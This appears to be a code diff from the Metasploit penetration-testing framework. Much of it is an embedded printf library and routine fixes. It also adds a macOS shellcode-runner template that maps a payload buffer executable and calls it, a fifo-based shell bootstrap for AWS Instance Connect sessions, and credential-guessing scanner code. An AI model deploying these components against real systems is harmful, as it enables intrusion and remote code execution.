+      ++whole;
+    }
+  }
+  else {
+    unsigned int count = prec;
+    // now do fractional part, as an unsigned number
+    while (len < PRINTF_FTOA_BUFFER_SIZE) {
+      --count;
+      buf[len++] = (char)(48U + (frac % 10U));
+      if (!(frac /= 10U)) {
+        break;
+      }
+    }
+    // add extra 0s
+    while ((len < PRINTF_FTOA_BUFFER_SIZE) && (count-- > 0U)) {
+      buf[len++] = '0';
+    }
+    if (len < PRINTF_FTOA_BUFFER_SIZE) {
+      // add decimal
+      buf[len++] = '.';
+    }
+  }
+
+  // do whole part, number is reversed
+  while (len < PRINTF_FTOA_BUFFER_SIZE) {
+    buf[len++] = (char)(48 + (whole % 10));
+    if (!(whole /= 10)) {
+      break;
+    }
+  }
+
+  // pad leading zeros
+  if (!(flags & FLAGS_LEFT) && (flags & FLAGS_ZEROPAD)) {
+    if (width && (negative || (flags & (FLAGS_PLUS | FLAGS_SPACE)))) {
+      width--;
+    }
+    while ((len < width) && (len < PRINTF_FTOA_BUFFER_SIZE)) {
+      buf[len++] = '0';
+    }
+  }
+
+  if (len < PRINTF_FTOA_BUFFER_SIZE) {
+    if (negative) {
+      buf[len++] = '-';
+    }
+    else if (flags & FLAGS_PLUS) {
+      buf[len++] = '+';  // ignore the space if the '+' exists
+    }
+    else if (flags & FLAGS_SPACE) {
+      buf[len++] = ' ';
+    }
+  }
+
+  return _out_rev(out, buffer, idx, maxlen, buf, len, width, flags);
+}
+
+
+#if defined(PRINTF_SUPPORT_EXPONENTIAL)
+// internal ftoa variant for exponential floating-point type, contributed by Martijn Jasperse <m.jasperse@gmail.com>
+static size_t _etoa(out_fct_type out, char* buffer, size_t idx, size_t maxlen, double value, unsigned int prec, unsigned int width, unsigned int flags)
+{
+  // check for NaN and special values
+  if ((value != value) || (value > DBL_MAX) || (value < -DBL_MAX)) {
+    return _ftoa(out, buffer, idx, maxlen, value, prec, width, flags);
+  }
+
+  // determine the sign
+  const bool negative = value < 0;
+  if (negative) {
+    value = -value;
+  }
+
+  // default precision
+  if (!(flags & FLAGS_PRECISION)) {
+    prec = PRINTF_DEFAULT_FLOAT_PRECISION;
+  }
+
+  // determine the decimal exponent
+  // based on the algorithm by David Gay (https://www.ampl.com/netlib/fp/dtoa.c)
+  union {
+    uint64_t U;
+    double   F;
+  } conv;
+
+  conv.F = value;
+  int exp2 = (int)((conv.U >> 52U) & 0x07FFU) - 1023;           // effectively log2
+  conv.U = (conv.U & ((1ULL << 52U) - 1U)) | (1023ULL << 52U);  // drop the exponent so conv.F is now in [1,2)
+  // now approximate log10 from the log2 integer part and an expansion of ln around 1.5
+  int expval = (int)(0.1760912590558 + exp2 * 0.301029995663981 + (conv.F - 1.5) * 0.289529654602168);
+  // now we want to compute 10^expval but we want to be sure it won't overflow
+  exp2 = (int)(expval * 3.321928094887362 + 0.5);
+  const double z  = expval * 2.302585092994046 - exp2 * 0.6931471805599453;
+  const double z2 = z * z;
+  conv.U = (uint64_t)(exp2 + 1023) << 52U;
+  // compute exp(z) using continued fractions, see https://en.wikipedia.org/wiki/Exponential_function#Continued_fractions_for_ex
+  conv.F *= 1 + 2 * z / (2 - z + (z2 / (6 + (z2 / (10 + z2 / 14)))));
+  // correct for rounding errors
+  if (value < conv.F) {
+    expval--;
+    conv.F /= 10;
+  }
+
+  // the exponent format is "%+03d" and largest value is "307", so set aside 4-5 characters
+  unsigned int minwidth = ((expval < 100) && (expval > -100)) ? 4U : 5U;
+
+  // in "%g" mode, "prec" is the number of *significant figures* not decimals
+  if (flags & FLAGS_ADAPT_EXP) {
+    // do we want to fall-back to "%f" mode?
+    if ((value >= 1e-4) && (value < 1e6)) {
+      if ((int)prec > expval) {
+        prec = (unsigned)((int)prec - expval - 1);
+      }
+      else {
+        prec = 0;
+      }
+      flags |= FLAGS_PRECISION;   // make sure _ftoa respects precision
+      // no characters in exponent
+      minwidth = 0U;
+      expval   = 0;
+    }
+    else {
+      // we use one sigfig for the whole part
+      if ((prec > 0) && (flags & FLAGS_PRECISION)) {
+        --prec;
+      }
+    }
+  }
+
+  // will everything fit?
+  unsigned int fwidth = width;
+  if (width > minwidth) {
+    // we didn't fall-back so subtract the characters required for the exponent
+    fwidth -= minwidth;
+  } else {
+    // not enough characters, so go back to default sizing
+    fwidth = 0U;
+  }
+  if ((flags & FLAGS_LEFT) && minwidth) {
+    // if we're padding on the right, DON'T pad the floating part
+    fwidth = 0U;
+  }
+
+  // rescale the float value
+  if (expval) {
+    value /= conv.F;
+  }
+
+  // output the floating part
+  const size_t start_idx = idx;
+  idx = _ftoa(out, buffer, idx, maxlen, negative ? -value : value, prec, fwidth, flags & ~FLAGS_ADAPT_EXP);
+
+  // output the exponent part
+  if (minwidth) {
+    // output the exponential symbol
+    out((flags & FLAGS_UPPERCASE) ? 'E' : 'e', buffer, idx++, maxlen);
+    // output the exponent value
+    idx = _ntoa_long(out, buffer, idx, maxlen, (expval < 0) ? -expval : expval, expval < 0, 10, 0, minwidth-1, FLAGS_ZEROPAD | FLAGS_PLUS);
+    // might need to right-pad spaces
+    if (flags & FLAGS_LEFT) {
+      while (idx - start_idx < width) out(' ', buffer, idx++, maxlen);
+    }
+  }
+  return idx;
+}
+#endif  // PRINTF_SUPPORT_EXPONENTIAL
+#endif  // PRINTF_SUPPORT_FLOAT
+
+
+// internal vsnprintf
+static int _vsnprintf(out_fct_type out, char* buffer, const size_t maxlen, const char* format, va_list va)
+{
+  unsigned int flags, width, precision, n;
+  size_t idx = 0U;
+
+  if (!buffer) {
+    // use null output function
+    out = _out_null;
+  }
+
+  while (*format)
+  {
+    // format specifier?  %[flags][width][.precision][length]
+    if (*format != '%') {
+      // no
+      out(*format, buffer, idx++, maxlen);
+      format++;
+      continue;
+    }
+    else {
+      // yes, evaluate it
+      format++;
+    }
+
+    // evaluate flags
+    flags = 0U;
+    do {
+      switch (*format) {
+        case '0': flags |= FLAGS_ZEROPAD; format++; n = 1U; break;
+        case '-': flags |= FLAGS_LEFT;    format++; n = 1U; break;
+        case '+': flags |= FLAGS_PLUS;    format++; n = 1U; break;
+        case ' ': flags |= FLAGS_SPACE;   format++; n = 1U; break;
+        case '#': flags |= FLAGS_HASH;    format++; n = 1U; break;
+        default :                                   n = 0U; break;
+      }
+    } while (n);
+
+    // evaluate width field
+    width = 0U;
+    if (_is_digit(*format)) {
+      width = _atoi(&format);
+    }
+    else if (*format == '*') {
+      const int w = va_arg(va, int);
+      if (w < 0) {
+        flags |= FLAGS_LEFT;    // reverse padding
+        width = (unsigned int)-w;
+      }
+      else {
+        width = (unsigned int)w;
+      }
+      format++;
+    }
+
+    // evaluate precision field
+    precision = 0U;
+    if (*format == '.') {
+      flags |= FLAGS_PRECISION;
+      format++;
+      if (_is_digit(*format)) {
+        precision = _atoi(&format);
+      }
+      else if (*format == '*') {
+        const int prec = (int)va_arg(va, int);
+        precision = prec > 0 ? (unsigned int)prec : 0U;
+        format++;
+      }
+    }
+
+    // evaluate length field
+    switch (*format) {
+      case 'l' :
+        flags |= FLAGS_LONG;
+        format++;
+        if (*format == 'l') {
+          flags |= FLAGS_LONG_LONG;
+          format++;
+        }
+        break;
+      case 'h' :
+        flags |= FLAGS_SHORT;
+        format++;
+        if (*format == 'h') {
+          flags |= FLAGS_CHAR;
+          format++;
+        }
+        break;
+#if defined(PRINTF_SUPPORT_PTRDIFF_T)
+      case 't' :
+        flags |= (sizeof(ptrdiff_t) == sizeof(long) ? FLAGS_LONG : FLAGS_LONG_LONG);
+        format++;
+        break;
+#endif
+      case 'j' :
+        flags |= (sizeof(intmax_t) == sizeof(long) ? FLAGS_LONG : FLAGS_LONG_LONG);
+        format++;
+        break;
+      case 'z' :
+        flags |= (sizeof(size_t) == sizeof(long) ? FLAGS_LONG : FLAGS_LONG_LONG);
+        format++;
+        break;
+      default :
+        break;
+    }
+
+    // evaluate specifier
+    switch (*format) {
+      case 'd' :
+      case 'i' :
+      case 'u' :
+      case 'x' :
+      case 'X' :
+      case 'o' :
+      case 'b' : {
+        // set the base
+        unsigned int base;
+        if (*format == 'x' || *format == 'X') {
+          base = 16U;
+        }
+        else if (*format == 'o') {
+          base =  8U;
+        }
+        else if (*format == 'b') {
+          base =  2U;
+        }
+        else {
+          base = 10U;
+          flags &= ~FLAGS_HASH;   // no hash for dec format
+        }
+        // uppercase
+        if (*format == 'X') {
+          flags |= FLAGS_UPPERCASE;
+        }
+
+        // no plus or space flag for u, x, X, o, b
+        if ((*format != 'i') && (*format != 'd')) {
+          flags &= ~(FLAGS_PLUS | FLAGS_SPACE);
+        }
+
+        // ignore '0' flag when precision is given
+        if (flags & FLAGS_PRECISION) {
+          flags &= ~FLAGS_ZEROPAD;
+        }
+
+        // convert the integer
+        if ((*format == 'i') || (*format == 'd')) {
+          // signed
+          if (flags & FLAGS_LONG_LONG) {
+#if defined(PRINTF_SUPPORT_LONG_LONG)
+            const long long value = va_arg(va, long long);
+            idx = _ntoa_long_long(out, buffer, idx, maxlen, (unsigned long long)(value > 0 ? value : 0 - value), value < 0, base, precision, width, flags);
+#endif
+          }
+          else if (flags & FLAGS_LONG) {
+            const long value = va_arg(va, long);
+            idx = _ntoa_long(out, buffer, idx, maxlen, (unsigned long)(value > 0 ? value : 0 - value), value < 0, base, precision, width, flags);
+          }
+          else {
+            const int value = (flags & FLAGS_CHAR) ? (char)va_arg(va, int) : (flags & FLAGS_SHORT) ? (short int)va_arg(va, int) : va_arg(va, int);
+            idx = _ntoa_long(out, buffer, idx, maxlen, (unsigned int)(value > 0 ? value : 0 - value), value < 0, base, precision, width, flags);
+          }
+        }
+        else {
+          // unsigned
+          if (flags & FLAGS_LONG_LONG) {
+#if defined(PRINTF_SUPPORT_LONG_LONG)
+            idx = _ntoa_long_long(out, buffer, idx, maxlen, va_arg(va, unsigned long long), false, base, precision, width, flags);
+#endif
+          }
+          else if (flags & FLAGS_LONG) {
+            idx = _ntoa_long(out, buffer, idx, maxlen, va_arg(va, unsigned long), false, base, precision, width, flags);
+          }
+          else {
+            const unsigned int value = (flags & FLAGS_CHAR) ? (unsigned char)va_arg(va, unsigned int) : (flags & FLAGS_SHORT) ? (unsigned short int)va_arg(va, unsigned int) : va_arg(va, unsigned int);
+            idx = _ntoa_long(out, buffer, idx, maxlen, value, false, base, precision, width, flags);
+          }
+        }
+        format++;
+        break;
+      }
+#if defined(PRINTF_SUPPORT_FLOAT)
+      case 'f' :
+      case 'F' :
+        if (*format == 'F') flags |= FLAGS_UPPERCASE;
+        idx = _ftoa(out, buffer, idx, maxlen, va_arg(va, double), precision, width, flags);
+        format++;
+        break;
+#if defined(PRINTF_SUPPORT_EXPONENTIAL)
+      case 'e':
+      case 'E':
+      case 'g':
+      case 'G':
+        if ((*format == 'g')||(*format == 'G')) flags |= FLAGS_ADAPT_EXP;
+        if ((*format == 'E')||(*format == 'G')) flags |= FLAGS_UPPERCASE;
+        idx = _etoa(out, buffer, idx, maxlen, va_arg(va, double), precision, width, flags);
+        format++;
+        break;
+#endif  // PRINTF_SUPPORT_EXPONENTIAL
+#endif  // PRINTF_SUPPORT_FLOAT
+      case 'c' : {
+        unsigned int l = 1U;
+        // pre padding
+        if (!(flags & FLAGS_LEFT)) {
+          while (l++ < width) {
+            out(' ', buffer, idx++, maxlen);
+          }
+        }
+        // char output
+        out((char)va_arg(va, int), buffer, idx++, maxlen);
+        // post padding
+        if (flags & FLAGS_LEFT) {
+          while (l++ < width) {
+            out(' ', buffer, idx++, maxlen);
+          }
+        }
+        format++;
+        break;
+      }
+
+      case 's' : {
+        const char* p = va_arg(va, char*);
+        unsigned int l = _strnlen_s(p, precision ? precision : (size_t)-1);
+        // pre padding
+        if (flags & FLAGS_PRECISION) {
+          l = (l < precision ? l : precision);
+        }
+        if (!(flags & FLAGS_LEFT)) {
+          while (l++ < width) {
+            out(' ', buffer, idx++, maxlen);
+          }
+        }
+        // string output
+        while ((*p != 0) && (!(flags & FLAGS_PRECISION) || precision--)) {
+          out(*(p++), buffer, idx++, maxlen);
+        }
+        // post padding
+        if (flags & FLAGS_LEFT) {
+          while (l++ < width) {
+            out(' ', buffer, idx++, maxlen);
+          }
+        }
+        format++;
+        break;
+      }
+
+      case 'p' : {
+        width = sizeof(void*) * 2U;
+        flags |= FLAGS_ZEROPAD | FLAGS_UPPERCASE;
+#if defined(PRINTF_SUPPORT_LONG_LONG)
+        const bool is_ll = sizeof(uintptr_t) == sizeof(long long);
+        if (is_ll) {
+          idx = _ntoa_long_long(out, buffer, idx, maxlen, (uintptr_t)va_arg(va, void*), false, 16U, precision, width, flags);
+        }
+        else {
+#endif
+          idx = _ntoa_long(out, buffer, idx, maxlen, (unsigned long)((uintptr_t)va_arg(va, void*)), false, 16U, precision, width, flags);
+#if defined(PRINTF_SUPPORT_LONG_LONG)
+        }
+#endif
+        format++;
+        break;
+      }
+
+      case '%' :
+        out('%', buffer, idx++, maxlen);
+        format++;
+        break;
+
+      default :
+        out(*format, buffer, idx++, maxlen);
+        format++;
+        break;
+    }
+  }
+
+  // termination
+  out((char)0, buffer, idx < maxlen ? idx : maxlen - 1U, maxlen);
+
+  // return written chars without terminating \0
+  return (int)idx;
+}
+
+
+///////////////////////////////////////////////////////////////////////////////
+
+int printf_(const char* format, ...)
+{
+  va_list va;
+  va_start(va, format);
+  char buffer[1];
+  const int ret = _vsnprintf(_out_char, buffer, (size_t)-1, format, va);
+  va_end(va);
+  return ret;
+}
+
+
+int sprintf_(char* buffer, const char* format, ...)
+{
+  va_list va;
+  va_start(va, format);
+  const int ret = _vsnprintf(_out_buffer, buffer, (size_t)-1, format, va);
+  va_end(va);
+  return ret;
+}
+
+
+int snprintf_(char* buffer, size_t count, const char* format, ...)
+{
+  va_list va;
+  va_start(va, format);
+  const int ret = _vsnprintf(_out_buffer, buffer, count, format, va);
+  va_end(va);
+  return ret;
+}
+
+
+int vprintf_(const char* format, va_list va)
+{
+  char buffer[1];
+  return _vsnprintf(_out_char, buffer, (size_t)-1, format, va);
+}
+
+
+int vsnprintf_(char* buffer, size_t count, const char* format, va_list va)
+{
+  return _vsnprintf(_out_buffer, buffer, count, format, va);
+}
+
+
+int fctprintf(void (*out)(char character, void* arg), void* arg, const char* format, ...)
+{
+  va_list va;
+  va_start(va, format);
+  const out_fct_wrap_type out_fct_wrap = { out, arg };
+  const int ret = _vsnprintf(_out_fct, (char*)(uintptr_t)&out_fct_wrap, (size_t)-1, format, va);
+  va_end(va);
+  return ret;
+}
@@ -0,0 +1,117 @@
+///////////////////////////////////////////////////////////////////////////////
+// \author (c) Marco Paland (info@paland.com)
+//             2014-2019, PALANDesign Hannover, Germany
+//
+// \license The MIT License (MIT)
+//
+// Permission is hereby granted, free of charge, to any person obtaining a copy
+// of this software and associated documentation files (the "Software"), to deal
+// in the Software without restriction, including without limitation the rights
+// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+// copies of the Software, and to permit persons to whom the Software is
+// furnished to do so, subject to the following conditions:
+// 
+// The above copyright notice and this permission notice shall be included in
+// all copies or substantial portions of the Software.
+// 
+// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
+// THE SOFTWARE.
+//
+// \brief Tiny printf, sprintf and snprintf implementation, optimized for speed on
+//        embedded systems with a very limited resources.
+//        Use this instead of bloated standard/newlib printf.
+//        These routines are thread safe and reentrant.
+//
+///////////////////////////////////////////////////////////////////////////////
+
+#ifndef _PRINTF_H_
+#define _PRINTF_H_
+
+#include <stdarg.h>
+#include <stddef.h>
+
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+
+/**
+ * Output a character to a custom device like UART, used by the printf() function
+ * This function is declared here only. You have to write your custom implementation somewhere
+ * \param character Character to output
+ */
+void _putchar(char character);
+
+
+/**
+ * Tiny printf implementation
+ * You have to implement _putchar if you use printf()
+ * To avoid conflicts with the regular printf() API it is overridden by macro defines
+ * and internal underscore-appended functions like printf_() are used
+ * \param format A string that specifies the format of the output
+ * \return The number of characters that are written into the array, not counting the terminating null character
+ */
+#define printf printf_
+int printf_(const char* format, ...);
+
+
+/**
+ * Tiny sprintf implementation
+ * Due to security reasons (buffer overflow) YOU SHOULD CONSIDER USING (V)SNPRINTF INSTEAD!
+ * \param buffer A pointer to the buffer where to store the formatted string. MUST be big enough to store the output!
+ * \param format A string that specifies the format of the output
+ * \return The number of characters that are WRITTEN into the buffer, not counting the terminating null character
+ */
+#define sprintf sprintf_
+int sprintf_(char* buffer, const char* format, ...);
+
+
+/**
+ * Tiny snprintf/vsnprintf implementation
+ * \param buffer A pointer to the buffer where to store the formatted string
+ * \param count The maximum number of characters to store in the buffer, including a terminating null character
+ * \param format A string that specifies the format of the output
+ * \param va A value identifying a variable arguments list
+ * \return The number of characters that COULD have been written into the buffer, not counting the terminating
+ *         null character. A value equal or larger than count indicates truncation. Only when the returned value
+ *         is non-negative and less than count, the string has been completely written.
+ */
+#define snprintf  snprintf_
+#define vsnprintf vsnprintf_
+int  snprintf_(char* buffer, size_t count, const char* format, ...);
+int vsnprintf_(char* buffer, size_t count, const char* format, va_list va);
+
+
+/**
+ * Tiny vprintf implementation
+ * \param format A string that specifies the format of the output
+ * \param va A value identifying a variable arguments list
+ * \return The number of characters that are WRITTEN into the buffer, not counting the terminating null character
+ */
+#define vprintf vprintf_
+int vprintf_(const char* format, va_list va);
+
+
+/**
+ * printf with output function
+ * You may use this as dynamic alternative to printf() with its fixed _putchar() output
+ * \param out An output function which takes one character and an argument pointer
+ * \param arg An argument pointer for user data passed to output function
+ * \param format A string that specifies the format of the output
+ * \return The number of characters that are sent to the output function, not counting the terminating null character
+ */
+int fctprintf(void (*out)(char character, void* arg), void* arg, const char* format, ...);
+
+
+#ifdef __cplusplus
+}
+#endif
+
+
+#endif  // _PRINTF_H_
@@ -0,0 +1 @@
+template_aarch64_darwin
@@ -0,0 +1,20 @@
+.PHONY: templates
+CFLAGS=-fno-stack-protector -fomit-frame-pointer -fno-exceptions -fPIC -Os -O0
+GCC_BIN_OSX=`xcrun --sdk macosx -f gcc`
+GCC_BASE_OSX=$(GCC_BIN_OSX) $(CFLAGS)
+GCC_OSX_X64=$(GCC_BASE_OSX) -arch x86_64
+GCC_OSX_AARCH64=$(GCC_BASE_OSX) -arch arm64
+
+all: templates
+
+template_aarch64_darwin: template_aarch64_darwin.c
+	$(GCC_OSX_AARCH64) -o $@ $^
+	strip $@
+
+templates: template_aarch64_darwin
+
+install: templates
+	cp template_aarch64_darwin ../../../../../data/templates/template_aarch64_darwin.bin
+
+clean:
+	rm -f template_aarch64_darwin
@@ -0,0 +1,18 @@
+#include <fcntl.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+
+char payload[8000] = "PAYLOAD:";
+int main() {
+    void *ptr = mmap(0, sizeof(payload), PROT_READ | PROT_WRITE, MAP_ANON | MAP_SHARED, -1, 0);
+    if (ptr == MAP_FAILED) {
+        return 0;
+    }
+    memcpy(ptr, payload, sizeof(payload));
+    mprotect(ptr, sizeof(payload), PROT_READ | PROT_EXEC);
+    int (*sc)() = ptr;
+    sc();
+    return 0;
+}
@@ -89,7 +89,7 @@ module Metasploit
            @link_script = opts[:linker_script]
            @compile_options = opts[:compile_options]
            @opt_lvl = opts[:opt_lvl]
-            @include_dirs = opts[:include_dirs]
+            @include_dirs = opts[:include_dirs] || []
            @mingw_bin = MINGW_X86
          end

@@ -112,7 +112,7 @@ module Metasploit
            @link_script = opts[:linker_script]
            @compile_options = opts[:compile_options]
            @opt_lvl = opts[:opt_lvl]
-            @include_dirs = opts[:include_dirs]
+            @include_dirs = opts[:include_dirs] || []
            @mingw_bin = MINGW_X64
          end

@@ -113,6 +113,7 @@ module Metasploit::Framework
          pass_from_file.chomp!
          yield Metasploit::Framework::Credential.new(private: pass_from_file, realm: realm, private_type: private_type(pass_from_file))
        end
+        pass_fd.seek(0)
      end
      additional_privates.each do |add_private|
        yield Metasploit::Framework::Credential.new(private: add_private, realm: realm, private_type: private_type(add_private))
@@ -243,6 +244,7 @@ module Metasploit::Framework
            pass_from_file.chomp!
            yield Metasploit::Framework::Credential.new(public: username, private: pass_from_file, realm: realm, private_type: private_type(pass_from_file))
          end
+          pass_fd.seek(0)
        end
        additional_privates.each do |add_private|
          yield Metasploit::Framework::Credential.new(public: username, private: add_private, realm: realm, private_type: private_type(add_private))
@@ -1,5 +1,5 @@
 require 'metasploit/framework/tcp/client'
-require 'rbmysql'
+require 'mysql'
 require 'metasploit/framework/login_scanner/base'
 require 'metasploit/framework/login_scanner/rex_socket'

@@ -35,29 +35,29 @@ module Metasploit
            disconnect if self.sock
            connect

-            ::RbMysql.connect(host, credential.public, credential.private, '', port, sock)
+            ::Mysql.connect(host, credential.public, credential.private, '', port, sock)

          rescue ::SystemCallError, Rex::ConnectionError => e
            result_options.merge!({
              status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT,
              proof: e
            })
-          rescue RbMysql::ClientError => e
+          rescue Mysql::ClientError => e
            result_options.merge!({
              status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT,
              proof: e
            })
-          rescue RbMysql::HostNotPrivileged => e
+          rescue Mysql::HostNotPrivileged => e
            result_options.merge!({
              status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT,
              proof: e
            })
-          rescue RbMysql::AccessDeniedError => e
+          rescue Mysql::AccessDeniedError => e
            result_options.merge!({
              status: Metasploit::Model::Login::Status::INCORRECT,
              proof: e
            })
-          rescue RbMysql::HostIsBlocked => e
+          rescue Mysql::HostIsBlocked => e
            result_options.merge!({
              status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT,
              proof: e
@@ -2,6 +2,7 @@
 require 'metasploit/framework/login_scanner/base'
 require 'metasploit/framework/login_scanner/rex_socket'
 require 'metasploit/framework/login_scanner/http'
+require 'metasploit/framework/login_scanner/kerberos'

 module Metasploit
  module Framework
@@ -60,6 +60,7 @@ module Metasploit
              host: domain_controller_rhost,
              hostname: hostname,
              mssql_port: rport,
+              proxies: proxies,
              realm: domain_name,
              username: user,
              password: pass,
@@ -32,7 +32,7 @@ module Metasploit
        end
      end

-      VERSION = "6.3.26"
+      VERSION = "6.3.33"
      MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
      PRERELEASE = 'dev'
      HASH = get_hash
@@ -0,0 +1,107 @@
+# -*- coding: binary -*-
+
+require 'rex/stopwatch'
+
+module Msf::Sessions
+  ###
+  #
+  # This class provides basic interaction with an AWS InstanceConnect
+  # session SSH socket
+  #
+  #  Date:    Feb 5, 2023
+  #  Author:  RageLtMan
+  #
+  ###
+  class AwsInstanceConnectCommandShellBind < Msf::Sessions::CommandShell
+
+    #
+    # This interface supports basic interaction.
+    #
+    include Msf::Session::Basic
+
+    #
+    # This interface supports interacting with a single command shell.
+    #
+    include Msf::Session::Provider::SingleCommandShell
+
+    def shell_command_token_unix(cmd, timeout=10)
+      res = shell_command_token_base(cmd, timeout, "\n")
+
+      res.gsub!("\r\n", "\n") if res
+      res
+    end
+
+    def shell_write(buf)
+      @ssh_command_stream.channel.send_data(buf)
+      # net-ssh queues the data to send to the remote end, wait for it to all be sent to fix stability issues
+      while @ssh_command_stream.channel.output.length > 0
+        sleep 0.1
+      end
+    end
+
+    #
+    # Create a sessions instance from an SshConnection. This will handle creating
+    # a new command stream.
+    #
+    # @param ssh_connection [Net::SSH::Connection] The SSH connection to create a
+    #   session instance for.
+    # @param opts [Hash] Optional parameters to pass to the session object.
+    def initialize(ssh_connection, opts = {})
+      @ssh_connection = ssh_connection
+      @sock = ssh_connection.transport.socket
+
+      @peer_info = ssh_connection.transport.socket.peerinfo
+      @local_info = ssh_connection.transport.socket.localinfo
+      @serial_username = opts[:serial_username]
+      @serial_password = opts[:serial_password]
+      self.platform = 'unix'
+      super(nil, opts)
+    end
+
+    #
+    # Accessor method for SSH session user
+    #
+    def ssh_username
+      @ssh_connection.options[:user]
+    end
+
+    alias username ssh_username
+
+    ##
+    #
+    # Returns the session description.
+    #
+    def desc
+      'AWS Instance Connect serial/SSH shell'
+    end
+
+    def bootstrap(datastore = {}, handler = nil)
+      @ssh_command_stream = Net::SSH::CommandStream.new(ssh_connection)
+
+      @ssh_command_stream.verify_channel
+      # set remote_window_size to 32 which seems to help stability
+      @ssh_command_stream.channel.do_window_adjust(-@ssh_command_stream.channel.remote_window_size + 32)
+      @rstream = @ssh_command_stream.lsock
+
+      if @serial_username.present? || @serial_password.present?
+        shell_write("#{@serial_username}\n")
+        shell_write("#{@serial_password}\n")
+      end
+
+      shell_command('stty -echo cbreak;pipe=$(mktemp -u);mkfifo -m 600 $pipe;cat $pipe & sh 1>$pipe 2>$pipe; rm $pipe; exit')
+      shell_read(-1)
+
+      @info = "EC2 Instance Connect #{@serial_username.present? ? @serial_username : ssh_username} @ #{@peer_info}"
+
+      super
+    end
+
+    def cleanup
+      super
+
+      ssh_connection.close rescue nil
+    end
+
+    attr_reader :serial_username, :sock, :ssh_connection
+  end
+end
@@ -221,7 +221,6 @@ Shell Banner:
    end

    if prompt_yesno("Background session #{name}?")
-      Rex::Ui::Text::Shell::HistoryManager.pop_context
      self.interacting = false
    end
  end
@@ -256,7 +255,6 @@ Shell Banner:
      print_status("Session #{self.name} is already interactive.")
    else
      print_status("Backgrounding session #{self.name}...")
-      Rex::Ui::Text::Shell::HistoryManager.pop_context
      # store the next session id so that it can be referenced as soon
      # as this session is no longer interacting
      self.next_session = args[0]
@@ -548,7 +546,7 @@ Shell Banner:
    if expressions.empty?
      print_status('Starting IRB shell...')
      print_status("You are in the \"self\" (session) object\n")
-      Rex::Ui::Text::Shell::HistoryManager.with_context(name: :irb) do
+      Rex::Ui::Text::Shell::HistoryManager.instance.with_context(name: :irb) do
        Rex::Ui::Text::IrbShell.new(self).run
      end
    else
@@ -587,7 +585,7 @@ Shell Banner:
    print_status('Starting Pry shell...')
    print_status("You are in the \"self\" (session) object\n")
    Pry.config.history_load = false
-    Rex::Ui::Text::Shell::HistoryManager.with_context(history_file: Msf::Config.pry_history, name: :pry) do
+    Rex::Ui::Text::Shell::HistoryManager.instance.with_context(history_file: Msf::Config.pry_history, name: :pry) do
      self.pry
    end
  end
@@ -748,7 +746,7 @@ protected
  # shell_write instead of operating on rstream directly.
  def _interact
    framework.events.on_session_interact(self)
-    Rex::Ui::Text::Shell::HistoryManager.with_context(name: self.type.to_sym) {
+    Rex::Ui::Text::Shell::HistoryManager.instance.with_context(name: self.type.to_sym) {
      _interact_stream
    }
  end
@@ -0,0 +1,28 @@
+# -*- coding: binary -*-
+
+
+module Msf
+module Sessions
+
+###
+#
+# This class creates a platform-specific meterpreter session type
+#
+###
+class Meterpreter_aarch64_OSX < Msf::Sessions::Meterpreter
+  def supports_ssl?
+    false
+  end
+  def supports_zlib?
+    false
+  end
+  def initialize(rstream, opts={})
+    super
+    self.base_platform = 'osx'
+    self.base_arch = ARCH_AARCH64
+  end
+end
+
+end
+end
+
@@ -93,7 +93,7 @@ module Evasion
      raise $!
    rescue ::Msf::OptionValidateError => e
      evasion.error = e
-      ::Msf::Ui::Formatter::OptionValidateError.print_error(mod, e)
+      ::Msf::Ui::Formatter::OptionValidateError.print_error(evasion, e)
    rescue ::Exception => e
      evasion.error = e
      evasion.print_error("evasion failed: #{e}")
@@ -0,0 +1,84 @@
+# -*- coding: binary -*-
+
+module Msf
+  class Exploit
+    class Remote
+      module HTTP
+        # This module provides a way of interacting with Apache NiFi installations
+        module Nifi
+          include Msf::Exploit::Remote::HttpClient
+          include Msf::Exploit::Remote::HTTP::Nifi::Auth
+          include Msf::Exploit::Remote::HTTP::Nifi::Processor
+          include Msf::Exploit::Remote::HTTP::Nifi::Dbconnectionpool
+
+          def initialize(info = {})
+            super
+
+            register_options(
+              [
+                Msf::Opt::RPORT(8443),
+                Msf::OptString.new('TARGETURI', [ true, 'The URI of the Apache NiFi Application', '/']),
+                Msf::OptString.new('USERNAME', [false, 'Username to authenticate with']),
+                Msf::OptString.new('PASSWORD', [false, 'Password to authenticate with']),
+                Msf::OptString.new('BEARER-TOKEN', [false, 'JWT authenticate with']),
+              ], Msf::Exploit::Remote::HTTP::Nifi
+            )
+
+            register_advanced_options([
+              Msf::OptBool.new('SSL', [true, 'Negotiate SSL connection', true])
+            ])
+          end
+
+          # Find the version number of the Apache NiFi system based on JS calls on the nifi/ page.
+          #
+          # @return [Gem::Version] version number of the system, or nil on error
+          def get_version
+            vprint_status('Attempting to retrieve version number')
+            res = send_request_cgi!(
+              'uri' => normalize_uri(target_uri.path, 'nifi/')
+            )
+
+            if res.nil?
+              print_bad("#{peer} - Could not connect to web service - no response")
+              return nil
+            end
+
+            unless res.code == 200
+              print_bad("#{peer} - Unexpected Response Code (response code: #{res.code})")
+              return nil
+            end
+
+            return Rex::Version.new(Regexp.last_match(1)) if res.body =~ %r{js/nf/nf-namespace\.js\?([\d.]*)">}
+
+            nil
+          end
+
+          # Fetch the root process group's UUID
+          #
+          # @param token [String] The bearer token from a valid login, or nil for no Authorization headers
+          # @return [String] The UUID of the root process group
+          def fetch_root_process_group(token)
+            vprint_status('Attempting to retrieve root process group')
+            opts = {
+              'method' => 'GET',
